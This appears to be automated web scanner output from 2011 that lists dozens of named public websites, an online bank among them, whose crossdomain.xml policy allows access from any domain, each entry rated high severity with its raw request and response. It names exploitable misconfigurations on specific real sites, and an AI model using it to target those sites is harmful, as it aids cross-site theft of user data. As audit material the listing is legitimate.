HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:45:56 GMT Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Last-Modified: Sun, 27 Jun 2010 23:26:28 GMT ETag: "cb-48a0b5558d100" Accept-Ranges: bytes Content-Length: 203 Cache-Control: public, must-revalidate, proxy-revalidate Expires: Sat, 09 Apr 2011 13:45:56 GMT Vary: Accept-Encoding,User Pragma: public X-Powered-By: W3 Total Cache/0.9.1.3 Connection: close Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-poli ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.cracked.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.cracked.com |
HTTP/1.0 200 OK Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.6 Last-Modified: Tue, 14 Jul 2009 21:42:53 GMT ETag: "bf8fd0-6c-46eb15220f140" Content-Type: application/xml Expires: Sat, 02 Apr 2011 13:33:14 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 02 Apr 2011 13:33:14 GMT Content-Length: 108 Connection: close Set-Cookie: BIGipServerorigin.cracked <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://www.crackle.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.crackle.com |
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Fri, 25 Feb 2011 01:20:08 GMT Accept-Ranges: bytes ETag: "32a0dd238ad4cb1:f88" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Connection: close Date: Sat, 02 Apr 2011 13:44:15 GMT Age: 15631 Content-Length: 126 ...<?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="*" secure="false" /> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://www.craveonline |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.craveonline.com |
HTTP/1.1 200 OK Server: Apache/2 Vary: Accept-Encoding X-Served-By: app1v-fe.sb.lax2 Content-Type: text/xml Content-Length: 260 Date: Sat, 02 Apr 2011 14:19:13 GMT X-Varnish: 732507065 Age: 0 Via: 1.1 varnish Connection: close X-Cache: MISS from pxy1v.sb.lax2 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <!-- Policy file for http://www.gorillanation ...[SNIP]... <allow-access-from domain="*"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.curse.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.curse.com |
HTTP/1.1 200 OK Set-Cookie: BIGipServer=1932476484 Content-Type: text/xml Last-Modified: Tue, 06 Apr 2010 00:25:04 GMT Accept-Ranges: bytes ETag: "070209a1fd5ca1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sat, 02 Apr 2011 13:39:41 GMT Xonnection: Xeep-alive Content-Length: 332 <?xml version="1.0" encoding="utf-8" ?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.daylife.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.daylife.com |
HTTP/1.1 200 OK Server: Apache Content-Type: text/xml; charset=utf-8 Vary: Accept-Encoding Content-Length: 140 Date: Sat, 02 Apr 2011 14:19:13 GMT X-Varnish: 3945368514 Age: 0 Via: 1.1 varnish Connection: close <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*"/> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://www.degrees.info |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.degrees.info |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:37:34 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 mod_ssl/2.2.8 OpenSSL/0.9.8g Last-Modified: Wed, 16 Mar 2011 14:47:14 GMT ETag: "52c1-db-49e9a9ed8c080" Accept-Ranges: bytes Content-Length: 219 Connection: close Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" secure="true" /> </cro ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.docstoc.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.docstoc.com |
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Fri, 22 Oct 2010 18:22:44 GMT Accept-Ranges: bytes ETag: "b44c91e1672cb1:0" serverID: web02 Date: Sat, 02 Apr 2011 13:30:53 GMT Connection: keep-alive Content-Length: 151 <cross-domain-policy> <allow-access-from domain="docstoc.com" to-ports="*" /> <allow-access-from domain="*" to-ports="*" /> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://www.doctoroz.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.doctoroz.com |
HTTP/1.0 200 OK Content-Type: text/xml; charset=utf-8 ETag: "4e5a-c9-4711fc791f940" Last-Modified: Fri, 14 Aug 2009 20:20:13 GMT Server: Apache Cache-Control: max-age=3600 Date: Sat, 02 Apr 2011 13:40:44 GMT Content-Length: 201 Connection: close X-N: S <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*"/> </cross-domain-policy> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.ebaumsworld |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.ebaumsworld.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:44:31 GMT Server: Apache/2.2.17 (EL) Last-Modified: Mon, 02 Feb 2009 22:06:45 GMT Accept-Ranges: bytes Content-Length: 213 Vary: Accept-Encoding,User Connection: close Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" to-ports="*" /> </cross-do ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.education.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.education.com |
HTTP/1.1 200 OK Server: nginx Date: Sat, 02 Apr 2011 13:34:11 GMT Content-Type: text/xml Content-Length: 201 Last-Modified: Mon, 28 Feb 2011 18:40:05 GMT Connection: close Expires: Thu, 31 Dec 2037 23:55:55 GMT Cache-Control: max-age=315360000 Accept-Ranges: bytes <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.ehow.co.uk |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.ehow.co.uk |
HTTP/1.0 200 OK Server: Apache Last-Modified: Fri, 01 Apr 2011 02:54:34 GMT Content-Type: text/xml Date: Sat, 02 Apr 2011 14:00:19 GMT Content-Length: 117 Connection: close <?xml version="1.0" encoding="UTF-8"?> <cross-domain-policy> <allow-access-from domain="*"/> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://www.eventful.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.eventful.com |
HTTP/1.0 200 OK Connection: close Expires: Sat, 16 Apr 2011 13:35:52 GMT Cache-Control: max-age=1209600 Content-Type: text/xml Accept-Ranges: bytes ETag: "1641692581" Last-Modified: Wed, 10 Feb 2010 18:55:07 GMT Content-Length: 201 Date: Sat, 02 Apr 2011 13:35:52 GMT Server: lighttpd <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.everydayhealth |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.everydayhealth.com |
HTTP/1.1 200 OK Content-Length: 369 Content-Type: text/xml Last-Modified: Fri, 17 Dec 2010 22:02:56 GMT Accept-Ranges: bytes ETag: "0e8ca28369ecb1:3da6" Server: Microsoft-IIS/6.0 ServerID: : USNJWWEB07 X-Powered-By: ASP.NET Date: Sat, 02 Apr 2011 13:26:17 GMT Connection: close ...<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <!--used for flash slideshows --> <cross-domain-policy> <site-control permi ...[SNIP]... <allow-access-from domain="*"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.evtv1.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.evtv1.com |
HTTP/1.1 200 OK Content-Length: 216 Content-Type: text/xml Last-Modified: Tue, 03 Mar 2009 14:07:08 GMT Accept-Ranges: bytes ETag: "2ed3e15699cc91:1433" Server: Microsoft-IIS/6.0 P3P: CP='NOI DSP COR LAW NID CUR PSAi PSDi OUR BUS UNI COM NAV INT STA OTC' X-Powered-By: ASP.NET Date: Sat, 02 Apr 2011 13:53:45 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross- ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.ew.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.ew.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:32:12 GMT Server: Apache Last-Modified: Fri, 24 Sep 2010 16:23:49 GMT ETag: "373-cdb58f40" Accept-Ranges: bytes Content-Length: 883 Content-Type: application/xml Vary: Accept-Encoding,X-Catmap P3P: CP='PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE CUR ADMa DEVa TAIo PSAo PSDo IVAo IVDo CONo TELo OTPi OUR UNRo PUBi OTRo IND DSP CAO COR' Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" secure="false"/> <allow-access-from domain="img2.timeinc.net"/> <allow-access-from domain="img2-short.timeinc.net"/> <allow-access-from domain="*.aol.com"/> <allow-access-from domain="*.digitalcity.com"/> <allow-access-from domain="*.aolcdn.com"/> <allow-access-from domain="*.channel.aol.com"/> <allow-access-from domain="*.aimtoday.com"/> <allow-access-from domain="*.aimtoday.aim.com"/> <allow-access-from domain="*.dashboard.aim.com"/> <allow-access-from domain="*.aim.com"/> <allow-access-from domain="peopleconnection.aol.com"/> <allow-access-from domain="*.peoplecmg.com"/> <allow-access-from domain="*.myspacecdn.com"/> <allow-access-from domain="*.taaz.com" secure="true"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.ez-tracks.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.ez-tracks.com |
HTTP/1.1 200 OK Connection: close Date: Sat, 02 Apr 2011 14:14:23 GMT Content-Length: 208 Content-Type: text/xml Content-Location: http://www.ez-tracks.com Last-Modified: Wed, 01 Dec 2004 14:18:24 GMT Accept-Ranges: bytes ETag: "12a73b9eb0d7c41:cb57" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-pol ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.flixster.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.flixster.com |
HTTP/1.0 200 OK Date: Sat, 02 Apr 2011 13:51:52 GMT Server: Apache Last-Modified: Thu, 31 Mar 2011 20:44:51 GMT ETag: "64" Accept-Ranges: bytes Content-Length: 100 Cache-Control: max-age=86400 Expires: Sun, 03 Apr 2011 13:51:52 GMT Vary: Accept-Encoding,User Connection: close Content-Type: text/xml <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://www.freeonlin |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.freeonlinegames.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:40:17 GMT Server: Apache/2.2.3 (CentOS) Last-Modified: Tue, 30 Nov 2010 17:53:10 GMT ETag: "180823b-a5-dc9e0d80" Accept-Ranges: bytes Content-Length: 165 Vary: Accept-Encoding Connection: close Content-Type: text/xml <?xml version="1.0"?> <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*" /> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://www.g4tv.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.g4tv.com |
HTTP/1.0 200 OK X-Cnection: close Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/xml Content-Length: 208 Cache-Control: private, max-age=58266 Date: Sat, 02 Apr 2011 13:40:33 GMT Connection: close X-N: S <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.gamerdna.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.gamerdna.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:31:55 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 PHP/5.2.5 Last-Modified: Sat, 22 Nov 2008 02:54:30 GMT ETag: "7bce-a2-45c3e47d96580" Accept-Ranges: bytes Content-Length: 162 Vary: Accept-Encoding,User Connection: close Content-Type: application/xml <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="*"/> <allow-http-request </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://www.gamesradar.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.gamesradar.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:35:56 GMT Server: Apache/2.2.11 (Ubuntu) mod_jk/1.2.26 Last-Modified: Tue, 04 May 2010 19:20:06 GMT ETag: "2bc0006-1cc-485c998 Accept-Ranges: bytes Content-Length: 460 Connection: close Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="gr22static.gamesradar.com" /> <allow-access-from domain="static22.gamesradar.com" /> ...[SNIP]... <allow-access-from domain="*.serving-sys.com" /> <allow-access-from domain="*" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.gametrailers |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.gametrailers.com |
HTTP/1.0 200 OK Server: Apache/2.0.63 (Unix) PHP/5.3.2 Last-Modified: Wed, 02 Feb 2011 00:17:00 GMT ETag: "1268c463d-cf-49b419 Accept-Ranges: bytes Content-Length: 207 Content-Type: application/xml Date: Sat, 02 Apr 2011 13:37:31 GMT Connection: close Set-Cookie: ak-mobile-detected=no; expires=Sat, 02-Apr-2011 19:37:31 GMT; path=/ Vary: User-Agent <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain- ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.gourmandia.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.gourmandia.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:57:42 GMT Server: Apache Last-Modified: Thu, 19 Aug 2010 21:34:46 GMT ETag: "66880b1-ce-f3774980" Accept-Ranges: bytes Content-Length: 206 Connection: close Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-p ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.greenwich |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.greenwichmeantime.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:58:32 GMT Server: Apache/2.0.63 (Red Hat) Last-Modified: Sat, 20 Mar 2010 13:46:58 GMT ETag: "c8c8aa-100-b408ce80" Accept-Ranges: bytes Content-Length: 256 Connection: close Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.groupon.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.groupon.com |
HTTP/1.0 200 OK Server: nginx/0.7.65 Content-Type: text/xml Accept-Ranges: bytes Age: 164396 Date: Sat, 02 Apr 2011 13:32:32 GMT Last-Modified: Thu, 18 Nov 2010 03:41:54 GMT Content-Length: 352 Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*" to-ports="80,443" secure="false" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.health.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.health.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:35:14 GMT Server: Apache Last-Modified: Fri, 24 Sep 2010 16:23:49 GMT ETag: "373-cdb58f40" Accept-Ranges: bytes Content-Length: 883 Content-Type: application/xml Vary: Accept-Encoding,X-Catmap P3P: CP='PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE CUR ADMa DEVa TAIo PSAo PSDo IVAo IVDo CONo TELo OTPi OUR UNRo PUBi OTRo IND DSP CAO COR' Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" secure="false"/> <allow-access-from domain="img2.timeinc.net"/> <allow-access-from domain="img2-short.timeinc.net"/> <allow-access-from domain="*.aol.com"/> <allow-access-from domain="*.digitalcity.com"/> <allow-access-from domain="*.aolcdn.com"/> <allow-access-from domain="*.channel.aol.com"/> <allow-access-from domain="*.aimtoday.com"/> <allow-access-from domain="*.aimtoday.aim.com"/> <allow-access-from domain="*.dashboard.aim.com"/> <allow-access-from domain="*.aim.com"/> <allow-access-from domain="peopleconnection.aol.com"/> <allow-access-from domain="*.peoplecmg.com"/> <allow-access-from domain="*.myspacecdn.com"/> <allow-access-from domain="*.taaz.com" secure="true"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.hiconversion |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.hiconversion.com |
HTTP/1.1 200 OK Content-Type: application/xml Date: Sat, 02 Apr 2011 13:58:17 GMT ETag: W/"104-1301603701000" Last-Modified: Thu, 31 Mar 2011 20:35:01 GMT Server: Apache/2.2.9 (Fedora) Vary: Accept-Encoding Content-Length: 104 Connection: Close <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://www.hodesiq.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.hodesiq.com |
HTTP/1.1 200 OK Content-Length: 208 Content-Type: text/xml Last-Modified: Mon, 20 Jul 2009 17:51:43 GMT Accept-Ranges: bytes ETag: "dbdeeabd629ca1:aea" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Sat, 02 Apr 2011 14:13:43 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.hollywood |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.hollywoodreporter.com |
HTTP/1.0 200 OK Server: Apache/2.2.3 (CentOS) Content-Type: text/xml Last-Modified: Sun, 10 Oct 2010 23:05:43 GMT Content-Length: 193 Cache-Control: max-age=60 Expires: Sat, 02 Apr 2011 13:45:55 GMT Date: Sat, 02 Apr 2011 13:44:55 GMT Connection: close <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*" /> <allow-http-request </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://www.howstuffworks |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.howstuffworks.com |
HTTP/1.0 200 OK Server: ATS/2.1.6-unstable Last-Modified: Sat, 02 Apr 2011 13:00:32 GMT P3P: CP="ALL DSP COR CUR ADMo DEVo TAIo PSAo PSDo IVAo CONi OTPi OUR NOR UNI" Content-Length: 200 Content-Type: text/xml; charset=UTF-8 Date: Sat, 02 Apr 2011 13:23:54 GMT Connection: close Set-Cookie: target=us; path=/; domain=.howstuffworks.com Expires: Sat, 02 Apr 2011 14:00:00 GMT <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://www.huffingtonpost |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.huffingtonpost.com |
HTTP/1.0 200 OK Server: Apache/2.2.8 (Unix) Last-Modified: Thu, 01 Jul 2010 13:55:20 GMT ETag: "26e2850-fd-48a53d22e2200 Content-Type: application/xml Date: Sat, 02 Apr 2011 12:37:46 GMT Content-Length: 253 Connection: close <?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.imagebam.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.imagebam.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:39:30 GMT Server: Apache Last-Modified: Sat, 21 Aug 2010 15:06:52 GMT ETag: "63bda7-cb-48e56c3e8fb00" Accept-Ranges: bytes Content-Length: 203 Connection: close Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-polic ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.imageshack.us |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.imageshack.us |
HTTP/1.1 200 OK Server: nginx/0.7.64 Date: Sat, 02 Apr 2011 13:31:41 GMT Content-Type: text/xml Content-Length: 1198 Last-Modified: Thu, 15 Jul 2010 21:31:01 GMT Connection: close Set-Cookie: is_uuid=fe9301e8d027 P3P: CP="NOI CUR ADM OUR NOR STA NID" X-Server-Name-And-Port: _:14000 Accept-Ranges: bytes <?xml version="1.0" ?> <cross-domain-policy> <allow-access-from domain="*" /> <allow-http-request <allow-http-requ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.ingdirect.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.ingdirect.com |
HTTP/1.1 200 OK Connection: close Server: Microsoft-IIS/7.0 Content-Type: text/xml Last-Modified: Thu, 26 Feb 2009 18:21:42 GMT Date: Sat, 02 Apr 2011 13:43:45 GMT Content-Length: 209 ETag: "pv26ac04c4b7dfa765f X-PvInfo: [S10232.C6966.A37933.RA0 Accept-Ranges: bytes <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-po ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.instructables |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.instructables.com |
HTTP/1.1 200 OK Server: Resin/3.0.28 P3P: IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA ETag: "DV9F16DWcqJ" Last-Modified: Sat, 15 Jan 2011 00:26:28 GMT Content-Type: text/xml Content-Length: 201 X-Cacheable: YES - 30 minutes Cache-Control: no-cache Date: Sat, 02 Apr 2011 13:36:03 GMT X-Varnish: 4054888881 4054848118 Age: 408 Via: 1.1 varnish X-Cache-Svr: squid02.instructables.com X-Cache: HIT X-Cache-Hits: 18 Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.instyle.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.instyle.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 14:04:57 GMT Server: Apache Last-Modified: Fri, 24 Sep 2010 16:23:49 GMT ETag: "373-cdb58f40" Accept-Ranges: bytes Content-Length: 883 Content-Type: application/xml Vary: Accept-Encoding,X-Catmap P3P: CP='PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE CUR ADMa DEVa TAIo PSAo PSDo IVAo IVDo CONo TELo OTPi OUR UNRo PUBi OTRo IND DSP CAO COR' Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" secure="false"/> <allow-access-from domain="img2.timeinc.net"/> <allow-access-from domain="img2-short.timeinc.net"/> <allow-access-from domain="*.aol.com"/> <allow-access-from domain="*.digitalcity.com"/> <allow-access-from domain="*.aolcdn.com"/> <allow-access-from domain="*.channel.aol.com"/> <allow-access-from domain="*.aimtoday.com"/> <allow-access-from domain="*.aimtoday.aim.com"/> <allow-access-from domain="*.dashboard.aim.com"/> <allow-access-from domain="*.aim.com"/> <allow-access-from domain="peopleconnection.aol.com"/> <allow-access-from domain="*.peoplecmg.com"/> <allow-access-from domain="*.myspacecdn.com"/> <allow-access-from domain="*.taaz.com" secure="true"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.intellicast |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.intellicast.com |
HTTP/1.1 200 OK Content-Length: 136 Content-Type: text/xml Content-Location: http://www.intellicast Last-Modified: Mon, 15 Feb 2010 17:02:22 GMT Accept-Ranges: bytes ETag: "e4451aa460aeca1:30d" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Sat, 02 Apr 2011 14:06:22 GMT Connection: close Set-Cookie: NSC_jdbtu_efgbvmu_iuuq_wt ...<?xml version="1.0" ?> <cross-domain-policy> <allow-access-from domain="*" to-ports="*" secure = "true"/> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://www.kaboodle.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.kaboodle.com |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: ss=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: ss=""; Path=/ ETag: W/"200-1301007108000" Last-Modified: Thu, 24 Mar 2011 22:51:48 GMT Content-Type: application/xml Content-Length: 200 Date: Sat, 02 Apr 2011 13:30:55 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://www.like.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.like.com |
HTTP/1.0 200 OK Server: Apache Last-Modified: Wed, 13 Jan 2010 18:02:03 GMT X-Like-Servetime: Servetime: D=603 Content-Type: application/xml Vary: User-Agent Date: Sat, 02 Apr 2011 13:55:28 GMT Content-Length: 360 Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.liveleak.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.liveleak.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:41:09 GMT Server: Apache Last-Modified: Wed, 20 Aug 2008 11:50:42 GMT ETag: "50284d-cd-48ac0512" Accept-Ranges: bytes Content-Length: 205 Connection: close Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-po ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.manualsonline |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.manualsonline.com |
